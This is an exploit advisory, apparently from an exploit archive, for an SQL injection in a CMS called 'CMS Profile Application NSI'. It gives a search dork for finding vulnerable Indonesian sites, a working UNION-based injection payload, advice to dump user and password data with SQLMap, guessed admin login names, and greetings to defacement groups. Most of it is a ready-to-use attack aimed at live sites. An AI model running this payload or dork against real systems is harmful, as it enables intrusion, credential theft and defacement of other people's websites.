# Exploit Title: CMS Profile Application NSI SQL-Injection Vulnerability
# Dork: inurl:/semua-tokoh.html site:id
# Date: 5-5-2019
# Exploit Author: ./Sn00py
# Team: Indonesian Code Party
# Vendor Homepage: https://www.nusansifor.com/
# Software Link: N/A
# Category: Webapps
# Version: 1.0
# Tested on: Windows 10 Pro
# CVE : N/A
=======================================
[+]Proof Of Concept:
First, you find out if the site has a search feature keywords and if you enter a string in the alert database errors occur the vuln.
[+]Exploit:
' and false div @s:=(user()) union select 1,2,@s,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 -- -
You can continue to dump database with the SQLMap manual or to take user and password~
[+]Login:
Administrator
Admin
Adminweb
Webadmin
[+]Demo? No Demo ^^ Happy Injecting~
Greetz: DarkOct02 - Indonesian Code Party - RSFLT - N45HT - PacmanCorp - AllindonesiaDefacer